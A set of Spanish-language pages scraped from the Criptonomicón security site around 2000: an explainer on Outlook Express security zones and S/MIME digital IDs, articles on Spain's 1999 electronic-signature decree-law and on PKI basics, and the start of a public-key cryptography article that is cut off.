<a href="http://www.iec.csic.es/criptonomicon/">Criptonomicn</a>

Si lo haces, te agradecera me lo comunicases.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/visitas.html (2 of 2) [25/10/2000 02:30:44 p.m.]

Caractersticas de seguridad en Outlook Express

Suscripcin gratis
Informacin general | Zonas de seguridad | Identificadores digitales | Correo electrnico seguro
Intimidad?

Artculos

Seguridad

Caractersticas de seguridad en
Outlook Express

Linux

Navegacin segura

Control de acceso

CGI

Java

Informacin general
Al extenderse el uso del correo electrnico y del comercio electrnico, la cantidad de informacin
confidencial que se intercambia en Internet ha crecido considerablemente. Por tanto, se necesitan
mensajes de correo electrnico seguros y privados. Con la creciente popularidad de los controles ActiveX,
secuencias de comados y subprogramas Java, aumenta la probabilidad de recibir contenido HTML en un
mensaje electrnico que pudiera modificar archivos de su PC sin su conocimiento.
Outlook Express incluye herramientas que le protegern contra el fraude, asegurarn su privacidad y
evitarn el acceso no autorizado a su PC. Estas herramientas le permitirn enviar y recibir correo
electrnico seguro y controlar mensajes electrnicos potencialmente dainos usando zonas de seguridad.

JavaScript

Zonas de seguridad

Cookies

Las zonas de seguridad de Internet Explorer 4.0 son como los visados que algunos pases expiden a los
viajeros. Si el pas confa en usted, sella su pasaporte de forma que pueda viajar donde desee durante la
visita. Si el pas no confa plenamente en usted, limita estrictamente los lugares de visita durante su
estancia.

Crashes

Agujeros

Spam

Remailers

Anonimato

Las zonas de seguridad funcionan de la misma forma, controlando el acceso a su PC de mensajes de


correo electrnico y pginas Web. Las zonas de seguridad proporcionan una proteccin avanzada para su
PC y su privacidad sin interrumpirle con avisos repetitivos.
Outlook Express le permite elegir la zona para el correo entrante sea de Internet o de sitios restringidos.
La zona elegida depende de su inquietud con respecto al contenido activo (por ejemplo, controles
ActiveX, archivos de comandos y subprogramas Java) y de si prefiere ejecutar libremente ese contenido
en su PC. Para cada zona de seguridad, puede configurar el nivel de seguridad entre alta, media, baja o
personalizada.
Para cambiar la configuracin de la zonas de seguridad para Outlook Express, haga clic en el
Herramientas men, haga clic en Opciones y luego en la Seguridad ficha. (Nota: Si cambia la
configuracin para la zona de Internet o la zona de sitios restringidos, tambin cambiar esta
configuracin para Internet Explorer y viceversa).

Correo seguro

Identificadores digitales
Web seguro

Susurros desde la Cripta

Para usar correo electrnico seguro en Outlook Express, necesita un identificador digital. Los
identificadores digitales (tambin llamados certificados) proporcionan un medio de probar su identidad
en Internet.
Los identificadores digitales le permiten firmar el correo electrnico para que los destinatarios se

file:///C|/TEMP/criptonomicon/criptonomicon/correo/outlook.html (1 of 3) [25/10/2000 02:30:45 p.m.]

Caractersticas de seguridad en Outlook Express


Consejos prcticos

Referencias

Libro de Visitas

aseguren de que el mensaje es realmente de usted y que no se alter. Tambin, los identificadores
digitales permiten a otras personas enviar mensajes cifrados. Para obtener ms informacin, busque
Estado de confianza de los identificadores digitales en la Ayuda de Outlook Express.

Obtener un identificador digital


El identificador digital lo expide un autoridad de certificados, una organizacin
responsable no slo de expedir los identificadores pero tambin de verificar
continuamente que sean vlidos. Puede enviar el identificador digital a cualquiera que
necesite enviar mensajes cifrados y puede usar el mismo identificador digital para enviar
mensajes firmados.
VeriSign, Inc. es la primera autoridad comercial de certificacin y el
proveedor de identificadores digitales preferido de Microsoft. Con la
oferta especial de VeriSign,, Los usuarios de Microsoft Internet Explorer 4.0 pueden
beneficiarse de un Id. digital personal sin coste adicional durante 60 das que pueden
utilizar para identificarse ante amigos, colegas laborales y servicios en lnea al enviar
correo electrnico seguro. Para dar el primer paso hacia el envo de correo electrnico
seguro, obtenga ahora el identificador digital.

Uso del identificador digital


Antes de enviar correo firmado, debe asociar el identificador digital con la cuenta de
correo electrnico que desea usar. Para hacerlo, haga clic en el Herramientas men y
haga clic en Cuentas. Seleccione la cuenta que desea usar con el identificador, haga clic
en Propiedades, y luego en la Seguridad ficha. Active la casilla llamada Uso de un
identificador digital al enviar mensajes seguros, y luego haga clic en identificador
digital. Seleccione el identificador digital que desea asociar a esta cuenta (slo se
mostrarn los identificadores digitales con la misma direccin electrnica que la direccin
para la cuenta).

Copia de seguridad del identificador digital


Parte del identificador digital es una clave privada ireemplazable que se almacena en su
PC. Si se pierde la clave privada, no podr enviar mensajes firmados o leer correo cifrado
con ese identificador digital. Se le recomienda hacer una copia de seguridad del
identificador digital en caso de que los archivos que contienen el identificador estn
daados o que no se puedan leer. Para hacer la copia de seguridad del identificador
digital, ejecute Internet Explorer, haga clic en el men Ver y despus haga clic en
Opciones de Internet. Haga clic en la ficha Contenido y despus en el botn
Personal Los botones Importar y Exportar en esta pgina le permiten administrar los
identificadores digitales.

Correo electrnico seguro


Ahora que tiene un identificador digital, puede enviar correo electrnico seguro. El correo electrnico
seguro en Outlook Express protege las comunicaciones en Internet de dos formas: mediante firmas
digitales y cifrado. Si usa las firmas digitales, puede firmar el mensaje de correo electrnico con un
identificador nico que asegura a la persona que lo reciba que usted es el remitente del mensaje y que
no ha sido alterado. El correo electrnico cifrado asegura que nadie pueda leer el contenido del mensaje
excepto el destinatario.
Debido a que Outlook Express usa el estndar S/MIME, otras personas pueden leer correo electrnico
seguro redactado por usted usando programas compatibles con esta tecnologa. Puede leer mensajes
redactados por otras personas usando programas de correo electrnico que sean compatibles con la
tecnologa S/MIME. Outlook Express tiene correo electrnico seguro integrado y proporciona un interfaz
fcil de usar para estas caractersticas:

file:///C|/TEMP/criptonomicon/criptonomicon/correo/outlook.html (2 of 3) [25/10/2000 02:30:45 p.m.]

Caractersticas de seguridad en Outlook Express

Enviar correo firmado. Correo electrnico firmado permite que un


destinatario de correo electrnico pueda identificarle. Para firmar
digitalmente un mensaje de correo electrnico, haga clic en el men
Herramientas y despus haga clic en Firmar digitalmente (o use el
botn en la barra de herramientas del mensaje). Para enviar correo
firmado, debe tener un identificador digital propio (ver arriba).
Recibir correo firmado. El correo electrnico firmado de otros le permite
verificar la autenticidad de un mensaje que el mensaje proviene de
supuesto remitente y que el mensaje no haya sido alterado en trnsito. Los
mensajes electrnicos firmados est designados con iconos de correo
electrnico firmado. Si tiene algn problema (descritos en los avisos de seguridad de Outlook
Express) con el correo electrnico firmado recibido, puede indicar que el mensaje ha sido
alterado o que no proviene del supuesto remitente.
Enviar correo cifrado. Cifrar un mensaje electrnico evita que otras personas lo lean cuando
est en trnsito. Para cifrar un mensaje de correo electrnico necesita el identificar digital de la
persona a la que le va a enviar correo electrnico. El identificador digital debe formar parte de la
entrada de la persona en la Libreta de direcciones. Para enviar correo cifrado, haga clic en el
men Herramientas y despus haga clic en Cifrar (o use el botn en la barra de herramientas
del mensaje).
Recibir correo cifrado. Al recibir un mensaje electrnico cifrado, puede tener confianza en que
el mensaje no ha sido ledo por ninguna otra persona. Outlook Express automticamente descifra
los mensajes, suponiendo que tiene el identificador digital correcto instalado en su PC.
Enviar su identificador digital a otros. Para que otros puedan enviarle correo cifrado,
necesitan su identificador digital. Para enviarlo, simplemente enve correo electrnico firmado
digitalmente (ver arriba) y Outlook Express incluir automticamente su identificador digital.
Recuperar los identificadores digitales de otros. Para enviar a otros correo cifrado, necesita
sus identificadores digitales. Outlook Express es el primer programa de correo electrnico que le
permite recuperar identificadores digitales va servicios de directorio. Para encontrar un
identificador digital, haga clic en el men Edicin y despus haga clic en Encontrar usuarios.
Seleccione un servicio de directorio que tenga identificadores digitales, por ejemplo el servicio de
directorio de VeriSign, escriba el nombre del destinatario o direccin electrnica en el campo de
bsqueda apropiado y haga clic en Buscar. Seleccione una lista del panel de resultados y haga
clic en Agregar a Libreta de direcciones. (Otra forma de obtener el identificador digital de
otra persona es recibir un mensaje de esa persona. Para agregar el identificador digital desde el
correo firmado a la Libreta de direcciones, haga clic en el men Archivo y haga clic en
Propiedades. Haga clic en la ficha Seguridad y despus en Agregar identificador digital a
Libreta de direcciones.
Cambiar el estado de confianza en los identificadores digitales. Al agregar el identificador
digital de alguien a la Libreta de direcciones, ver el estado de confianza asociado que indica si
tiene confianza en la persona, grupo o compaa. Si el propietario de un identificador digital le
avisa que sospecha que hay problemas con la clave privada del identificador, puede cambiar la
confianza del estado de confianza a "Explcitamente no fiable". Para obtener ms informacin
consulte sobre el estado de confianza de un identificador digital en la Ayuda de Outlook Express.

Nota: La informacin de esta pgina es una reproduccin del correo que se distribuye a los usuarios nuevos de Outlook Express,
titulado "Caractersticas de seguridad en Outlook Express".

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/correo/outlook.html (3 of 3) [25/10/2000 02:30:45 p.m.]

Espaa, a la vanguardia de las firmas electrnicas

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Espaa, a la vanguardia de las firmas electrnicas


En Espaa siempre nos ha gustado regodearnos en la idea de que somos
los ms atrasados de Europa, de que vivimos en un pas de chirigota y
pandereta, donde son siempre los otros (los alemanes, los ingleses, los
nrdicos), los que impulsan los avances tecnolgicos a los que con retraso
nos apuntamos aos despus chapuceramente.
Cuadro falso o retrato acertado, lo cierto es que en materia de seguridad y
criptografa, Espaa est protagonizando una serie de iniciativas para
proteger la seguridad y la intimidad en las comunicaciones telemticas que
la sitan a la cabeza de Europa, si no del mundo, como atestigu en
primavera la experiencia pionera de declaracin de renta a travs de
Internet. El Real Decreto-Ley 14/1999 de 17 de septiembre sobre firma
electrnica viene a ratificar este deseo de acelerar la introduccin y rpida
difusin de esta tecnologa criptogrfica de clave pblica, as como de dotar
de la adecuada seguridad jurdica a las firmas digitales con el fin ltimo de
espolear el desarrollo de la sociedad de la informacin en nuestro pas.
En palabras del propio Decreto-Ley, ste "persigue, respetando el contenido
de la posicin comn respecto de la Directiva sobre firma electrnica,
establecer una regulacin clara del uso de sta, atribuyndole eficacia
jurdica y previendo el rgimen aplicable a los prestadores de servicios de
certificacin. Determina el registro en el que habrn de inscribirse los
prestadores de servicios de certificacin y el rgimen de inspeccin
administrativa de su actividad, regula la expedicin y la prdida de eficacia
de los certificados y tipifica las infracciones y las sanciones que se prevn
para garantizar su cumplimiento".
A continuacin, merece la pena realizar algunas aclaraciones que eluciden lo
que el texto recoge. Para el profano, baste decir que por firma electrnica,
segn definicin recogida en el Decreto-Ley, se entiende "el conjunto de
datos, en forma electrnica, anejos a otros datos electrnicos o asociados
funcionalmente con ellos, utilizados como medio para identificar formalmente

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros10.html (1 of 5) [25/10/2000 02:30:46 p.m.]

Espaa, a la vanguardia de las firmas electrnicas


Consejos prcticos

Referencias

Libro de Visitas

al autor o a los autores del documento que la recoge". A continuacin se


proporciona otra definicin, ms acorde con la idea comn que se tiene de
firma digital basada en PKI, concepto que de forma general denomina el
texto firma electrnica avanzada: "la firma electrnica que permite la
identificacin del signatario y ha sido creada por medios que ste mantiene
bajo su exclusivo control, de manera que est vinculada nicamente al
mismo y a los datos a los que se refiere, lo que permite que sea detectable
cualquier modificacin ulterior de stos". Por signatario se entiende "la
persona fsica que cuenta con un dispositivo de creacin de firma y que
acta en nombre propio o en el de una persona fsica o jurdica a la que
representa".
En definitiva, qu valor tiene la firma electrnica? Segn las definiciones
anteriores, se deduce que la firma permite identificar unvocamente al
signatario, es decir, proporciona el servicio de autenticacin (verificacin de
la identidad del firmante para estar seguro de que fue l y no otro el autor del
documento) y de no repudio (seguridad de que el autor del documento no
puede retractarse en el futuro de las opiniones o acciones consignadas en
l). Adems, la firma permite que sea detectada cualquier modificacin de
los datos firmados, proporcionando as una garanta de integridad ante
alteraciones fortuitas o deliberadas durante la transmisin y manipulacin
telemtica del documento firmado. El hecho de que la firma haya sido creada
por el signatario mediante medios que mantiene bajo su propio control (su
clave privada protegida, por ejemplo, por una contrasea, datos biomtricos,
una tarjeta chip, etc.) asegura, adems, la imposibilidad de su suplantacin.
As, en el caso de la utilizacin de firmas digitales para acceder a servicios
de red o autenticarse ante servidores, se previenen ataques comunes de
captacin de contraseas mediante el uso de analizadores de protocolos o la
ejecucin de reventadores de contraseas.
Otro concepto criptogrfico directamente vinculado con el de firma digital es
el de certificado, que segn el Decreto-Ley "es la certificacin electrnica
que vincula unos datos de verificacin de firma a un signatario y confirma su
identidad". No es otra cosa que la vinculacin de la clave pblica del
signatario con su identidad real verificada fehacientemente por el prestador
de servicios de certificacin . Una definicin fuerte del mismo es lo que se
denomina certificado reconocido, es decir, "el certificado que contiene la
informacin descrita en el artculo 8 y es expedido por un prestador de
servicios de certificacin que cumple los requisitos enumerados en el artculo
12".
Los prestadores de servicios de certificacin (PSC) anteriormente referidos
son la "persona fsica o jurdica que expide certificados, pudiendo prestar,
adems, otros servicios en relacin con la firma electrnica". En otras
palabras, lo que normalmente se entiende por autoridades de certificacin
(AC), al estilo de VeriSign (www.verisign.com) o ACE (www.ace.es) o FESTE
(www.feste.com) en Espaa. Se contempla que cualquier entidad u

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros10.html (2 of 5) [25/10/2000 02:30:46 p.m.]

Espaa, a la vanguardia de las firmas electrnicas

organizacin pblica o privada se constituya en PSC, fomentando as la libre


competencia tambin en este mbito.
Los requisitos que enumera el artculo 8 para que un certificado sea
reconocido incluyen: la indicacin de que se expiden como tales; el cdigo
identificativo nico del certificado; la identificacin del prestador de servicios
de certificacin que expide el certificado (es decir, de la autoridad de
certificacin); la firma electrnica avanzada del prestador de servicios de
certificacin que expide el certificado (la firma digital de la AC que da fe de
que el certificado expedido es vlido); la identificacin del signatario, por su
nombre y apellidos o a travs de un seudnimo que conste como tal de
manera inequvoca (a menudo se incluyen otros datos, como su pgina web
personal o su direccin de correo o alguna otra informacin relevante para el
certificado); los datos de verificacin de firma (es decir, la clave pblica) que
correspondan a los datos de creacin de firma que se encuentren bajo el
control del signatario (su clave privada); el comienzo y el fin del perodo de
validez del certificado; los lmites de uso del certificado, si se prevn; los
lmites del valor de las transacciones para las que puede utilizarse el
certificado, si se establecen.
Por su parte, los artculos 7, 11 y 12 recogen las obligaciones exigibles a los
prestadores de servicios de certificacin que expidan certificados
reconocidos, entre las que destacan: la comprobacin de la identidad de los
solicitantes de los certificados (ya que si esta verificacin no se realiza
rigurosamente, toda la idea de certificados y firmas digitales pierde su
validez), no almacenar las claves privadas de los usuarios, informar
debidamente a los solicitantes acerca de precios y condiciones de utilizacin
de los certificados, mantener un registro de todos los certificados emitidos y
de su estado de validez, indicar la fecha y la hora en las que se expidi o se
dej sin efecto un certificado, demostrar la fiabilidad necesaria de sus
servicios, garantizar la rapidez y la seguridad en la prestacin del servicio,
emplear personal cualificado y con la experiencia necesaria para la
prestacin de los servicios ofrecidos, en el mbito de la firma electrnica y
los procedimientos de seguridad y de gestin de terceros interesados, utilizar
sistemas y productos fiables protegidos contra toda alteracin, tomar
medidas contra la falsificacin de certificados, conservar registrada toda la
informacin y documentacin relativa a un certificado reconocido durante
quince aos, utilizar sistemas fiables para almacenar certificados.
Un prrafo importante en el artculo 12 es el g), en el que se exige "disponer
de los recursos econmicos suficientes para operar de conformidad con lo
dispuesto en este Real Decreto-Ley y, en particular, para afrontar el riesgo
de la responsabilidad por daos y perjuicios. Para ello habrn de garantizar
su responsabilidad frente a los usuarios de sus servicios y terceros
afectados por stos. La garanta a constituir podr consistir en un
afianzamiento mercantil prestado por una entidad de crdito o en un seguro
de caucin. Inicialmente, la garanta cubrir, al menos, el 4 por 100 de la

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros10.html (3 of 5) [25/10/2000 02:30:46 p.m.]

Espaa, a la vanguardia de las firmas electrnicas

suma de los importes lmite de las transacciones en que puedan emplearse


el conjunto de los certificados que emita cada prestador de servicios de
certificacin. Teniendo en cuenta la evolucin del mercado, el Gobierno, por
Real Decreto, podr reducir el citado porcentaje hasta el 2 por 100. En caso
de que no se limite el importe de las transacciones en las que puedan
emplearse al conjunto de los certificados que emita el prestador de servicios
de certificacin, la garanta a constituir cubrir, al menos, su responsabilidad
por un importe de 1.000.000.000 de pesetas (6.010.121,04 euros). El
Gobierno, por Real Decreto, podr modificar el referido importe".
Este artculo define claramente la responsabilidad civil de los prestadores de
servicios de certificacin, hasta ahora muy imprecisa, y por lo tanto elemento
que retraa su despliegue. Los usuarios de certificados y de firmas digitales
saben as (es deber del PSC informarles) a qu atenerse en caso de que
existan irregularidades con sus firmas, de las cuales se demuestre la
responsabilidad del PSC, bien por negligencia, bien por algn fallo de
seguridad o tcnico en sus equipos.
Se incorpora adems una novedad en el texto, para permitir que la
certificacin pueda recoger la fecha y la hora en la que se produce la
actividad certificante. Pinsese que, en muchas situaciones, el mero hecho
de saber que un documento fue firmado no es suficiente, ya que se necesita
poseer constancia de la fecha y hora de la firma. Esta circunstancia se
vuelve especialmente evidente en el caso de que un certificado haya sido
revocado, para saber si un documento fue firmado antes o despus de la
inutilizacin del certificado del signatario.
Tambin se presta especial atencin a los datos personales de los
solicitantes de certificados manipulados por los PSC, que se sujetan a lo
dispuesto en la LORTAD y en las disposiciones dictadas en su desarrollo.
Resumiendo, la firma electrnica proporciona un abanico importante de
servicios, como autenticacin, integridad, no repudio, auditabilidad, que
dotan a los documentos electrnicos as firmados de una validez legal y
responsabilidad civil equivalentes a las de la firma manuscrita sobre
documentos en papel. Las consecuencias de la rpida adopcin de la
inminente reglamentacin en materia de firma electrnica sern la
dinamizacin del comercio electrnico y agilizacin de las transacciones
financieras y de todo tipo. Se prev que este Decreto-Ley se transforme en
otro agente impulsor del desarrollo de la sociedad de la informacin, en la
medida en que contribuye a fomentar la adopcin de tcnicas digitales y de
tecnologas de la informacin y comunicaciones en sustitucin de las
anticuadas y lentas gestiones rellenando formularios, albaranes, contratos
en papel y dems procesos que hasta el momento se venan haciendo de
forma manual con medios fsicos.
Los retos inmediatos a que se enfrenta Espaa son la creacin de una
estructura de certificacin slida, mediante la progresiva consolidacin de los
file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros10.html (4 of 5) [25/10/2000 02:30:46 p.m.]

Espaa, a la vanguardia de las firmas electrnicas

PSC existentes y exploracin de nuevos rboles de certificacin. Por otro


lado, las empresas deben recoger el testigo y familiarizarse con las
tecnologas de PKI y certificados digitales para aumentar la seguridad global
de sus negocios y dar el paso hacia la gestin digital de su burocracia
interna, con otras empresas y con la Administracin. Se trata de un esfuerzo
comn, en el que todos tomamos parte. La aceptacin social y cobertura
legal de las firmas electrnicas pavimentar sin duda la carretera hacia la
nueva revolucin de la informacin.
Publicado en el Boletn del Criptonomicn #56.

Informacin adicional

El texto completo del Decreto-Ley en formato PDF (54 KB)

Los secretos de la firma electrnica

Firma digital

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros10.html (5 of 5) [25/10/2000 02:30:46 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/firma.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/firma.gif [25/10/2000 02:30:46 p.m.]

PKI o los cimientos de una criptografa de clave pblica

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

PKI o los cimientos de una criptografa de clave pblica


En los ltimos meses se ha vuelto difcil encontrar un anuncio o propaganda
sobre productos de seguridad y soluciones globales seguras para su
empresa que no incluya alguna referencia a PKI. Las infraestructuras de
clave pblica (PKI en ingls) se estn poniendo de moda. Es todo una
nueva palabra mgica en labios de sonrientes comerciales? Qu hay
detrs de las PKI? Qu significa PKI exactamente?
PKI se basa en la criptografa de clave pblica, cuyos orgenes se remontan
al artculo seminal de Diffie y Hellman en 1976, donde se explica la idea
revolucionaria de servirse para las operaciones criptogrficas de una pareja
de claves, una pblica, conocida por todos, y otra privada, slo conocida por
el usuario a quien le es asignada. Un mensaje puede ser cifrado por
cualquier persona usando la clave pblica, ya que es pblicamente
conocida, aunque slo el poseedor de la clave privada podr descifrarlo.
Recprocamente, un mensaje cifrado con la clave privada slo puede ser
cifrado por su poseedor, mientras que puede ser descifrado por cualquiera
que conozca la clave pblica.
Estas propiedades de que goza la criptografa de clave pblica, cuyo uso
ms comn se plasma en la firma digital, la convierten en candidata ideal
para prestar servicios como la autenticacin de usuarios (para asegurarse de
la identidad de un usuario, bien como signatario de documentos o para
garantizar el acceso a servicios distribuidos en red, ya que slo l puede
conocer su clave privada, evitando as la suplantacin), el no repudio (para
impedir que una vez firmado un documento el signatario se retracte o niegue
haberlo redactado), la integridad de la informacin (para prevenir la
modificacin deliberada o accidental de los datos firmados, durante su
transporte, almacenamiento o manipulacin), la auditabilidad (para identificar
y rastrear las operaciones, especialmente cuando se incorpora el
estampillado de tiempo), y el acuerdo de claves secretas para garantizar la
confidencialidad de la informacin intercambiada, est firmada o no. Desea
proporcionar todos estos servicios de seguridad en su empresa? PKI puede

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros11.html (1 of 4) [25/10/2000 02:30:47 p.m.]

PKI o los cimientos de una criptografa de clave pblica


Consejos prcticos

Referencias

Libro de Visitas

ser la respuesta.
Ahora bien, cmo podemos estar seguros de que la clave pblica de un
usuario, que hemos encontrado por ejemplo en un directorio o una pgina
web, corresponde realmente a ese individuo y no ha sido falsificada por
otro? Cmo fiarnos de esa clave pblica antes de confiarle algn secreto
nuestro? La solucin ms ampliamente adoptada consiste en recurrir a una
tercera parte confiable, erigida en la figura de una autoridad de certificacin
(AC). La funcin bsica de una AC reside en verificar la identidad de los
solicitantes de certificados, crear los certificados y publicar listas de
revocacin cuando stos son inutilizados. El certificado contiene de forma
estructurada informacin acerca de la identidad de su titular, su clave pblica
y la AC que lo emiti. Actualmente, el estndar al uso es el X.509.v3.
Con el tiempo, una autoridad de certificacin puede verse fcilmente
desbordada si cubre un rea geogrfica muy extensa o muy poblada, por lo
que a menudo delega en las llamadas autoridades de registro (AR) la labor
de verificar la identidad de los solicitantes. Las AR pueden abrir multitud de
oficinas regionales dispersas por un gran territorio, llegando hasta los
usuarios en los sitios ms remotos, mientras que la AC se limitara as a
certificar a todos los usuarios aceptados por las AR dependientes de ella.
Gracias a esta descentralizacin se agiliza el proceso de certificacin y se
aumenta la eficacia en la gestin de solicitudes.
En definitiva, una PKI incluir una o varias autoridades de registro para
certificar la identidad de los usuarios; una o varias autoridades de
certificacin que emitan los certificados de clave pblica; un repositorio de
certificados, accesible va web u otro medio, donde se almacenen los
certificados; las listas de revocacin de certificados (CRL), donde se listan
los certificados suspendidos o revocados; y, por supuesto, los propios
certificados.
Los mayores obstculos a los que se han enfrentado las empresas pioneras
en la implantacin de soluciones PKI para sus necesidades de negocio
electrnico (e-Business) han sido tradicionalmente:
La falta de interoperabilidad, ya que el mero hecho de ceirse al
estndar X.509.v3 no garantiza en absoluto que dos certificados
generados por dos sistemas desarrollados por casas distintas sean
mutuamente compatibles. Adems, existen problemas de confianza
entre AC de distintas organizaciones, que puede imposibilitar la
verificacin con xito de cadenas de certificacin cuya AC raz sea
desconocida o no confiable, invalidndose todo el esquema de PKI.
El coste ha sido un problema desde el principio. Al no existir un
mercado suficientemente maduro en PKI, cada empresa que ofrece
soluciones de clave pblica tarifica en funcin de criterios diversos (por
certificado, por uso de certificado, por servidores instalados,...) y cobra
honorarios tambin dispares, de manera que la inversin en PKI como

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros11.html (2 of 4) [25/10/2000 02:30:47 p.m.]

PKI o los cimientos de una criptografa de clave pblica

respuesta a las necesidades de seguridad y accesibilidad a los activos


informticos de la empresa puede resultar cuando menos
inesperadamente elevada.
PKI termina presentando problemas de escalabilidad, cuando el
nmero de certificados emitidos a los usuarios va creciendo, debido a
que las listas de revocacin deben ser consultadas en cada operacin
que involucre certificados y firmas digitales, si se desea una
implantacin seria y robusta de PKI. Bien es cierto que el esquema de
confianza vertical, promulgado por las estructuras de certificacin en
rbol, resulta ms escalable que los modelos de confianza horizontal,
como el adoptado por PGP, cuya problemtica es tan seria que no se
prev solucin satisfactoria.
Finalmente, la tecnologa PKI se le antoja un tanto esotrica al usuario
final, que no terminan de entender del todo la jerga relacionada.
Acostumbrado a autenticarse sin ms que introducir su nombre y
contrasea, puede sentirse fcilmente rebasado por la complejidad
tecnolgica de las firmas digitales y dems funciones criptogrficas.
Por dems, en la medida en que no se instauren las tarjetas chip,
controles biomtricos y otros dispositivos similares criptogrficamente
robustos, el problema de los usuarios anotando su contrasea (en este
caso para acceder a su clave privada) en un post-it pegado en el
monitor persistir por mucho tiempo.

Por lo tanto, constituye PKI la solucin a sus problemas? La respuesta


depende de qu problemas afronte. No existen frmulas mgicas ni
soluciones generales aptas para todo tipo de negocio.
La PKI resulta ideal en una intranet, en la que se comparten documentos
(trabajo en grupo), se accede a recursos de red (clculo, servidores de
archivos, bases de datos, etc.), se intercambia correo certificado entre los
empleados, etc. PKI resulta mucho ms gil que los sistemas tradicionales
de control basados en nombre y contrasea y listas de control de acceso.
En el caso de extranets o de Internet, PKI es de uso obligado. De hecho, es
la nica forma conocida actualmente de prestar confianza a los actores de
las relaciones telemticas que no se conocen entre ellos, tanto en el
business-to-business entre empresas, como en el comercio al por menor,
entre vendedores y compradores particulares por Internet. La confianza en
un grupo de AC mundialmente reconocidas (como VeriSign) o localmente
aceptadas (como FNMT, ACE o FESTE en Espaa) permite que las
entidades involucradas puedan fiarse unas de otras, a pesar de no existir
contacto fsico ni vnculo previo entre las partes. SSL y SET se estn
convirtiendo en estndares de facto que atestiguan el xito de las
tecnologas de clave pblica en escenarios de seguridad descentralizados
como Internet. Las ltimas iniciativas de las Administraciones Pblicas para
descargar procedimientos administrativos, realizados en papel y sometidos a
la venalidad burocrtica, hacia procesos digitales interactivos, hacen uso
file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros11.html (3 of 4) [25/10/2000 02:30:47 p.m.]

PKI o los cimientos de una criptografa de clave pblica

tambin de tecnologa PKI.


Pinselo. PKI puede ser la respuesta a su futuro. Eso s, no olvide definir
correctamente cules son sus necesidades exactas y entonces elija la
estrategia PKI que mejor se adapte a su modelo de negocio. Exija
soluciones/productos integrables centrados en su proceso de negocio. Slo
entonces la tecnologa probar ser su mejor aliado.
Publicado en el Boletn del Criptonomicn #57.

Informacin adicional

Los secretos de la firma electrnica

Introduccin a la Infraestructura de Clave Pblica

Conceptos bsicos sobre PKI

Firma digital

Criptografa de clave pblica

Cmo funcionan las firmas digitales

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros11.html (4 of 4) [25/10/2000 02:30:47 p.m.]

Criptografa de clave pblica

Comercio electrnico

Criptologa y seguridad

Criptografa de clave pblica

Cuestiones legales

Por Jordi Herrera Joancomart

Intimidad y privacidad

En los ltimos aos, el crecimiento vertiginoso de las redes de

Virus

comunicaciones y el aumento de usuarios de estas est conllevando nuevos


problemas a los cuales no les sirven las soluciones obtenidas hasta el
momento. Un ejemplo claro lo encontramos en la seguridad. Cuando las
redes de comunicaciones informticas eran privilegio de unos pocos, estos
podan intercambiar informacin entre ellos de un modo seguro utilizando lo
que hoy conocemos como sistemas de clave simtrica. Para ello cuando dos
usuarios quieren mantener una comunicacin segura estos deben compartir
una clave secreta que tan solo ambos conocen. Esta clave se utiliza tanto
para cifrar la informacin como para descifrarla luego, permitiendo de este
modo obtener un canal de comunicacin seguro. El precio que se paga es el
hecho que para cada par de usuarios que se quiera establecer una
comunicacin segura se requiere una clave distinta. Si hacemos cuentas,
vemos que de este modo un usuario de una red debe almacenar tantas
claves como personas con las que desee mantener una comunicacin
segura. Este hecho no constitua ningn problema antao si bien ahora, con
la cantidad de usuarios que existen en las redes se convierte en
impracticable y implica nuevas respuestas para el problema de la
comunicacin segura.
En direccin a la solucin de estos problemas nace lo que se conoce como
criptografa de clave pblica. La idea general es proveer a cada usuario de
un solo par de claves (una pblica y una privada) independientemente del
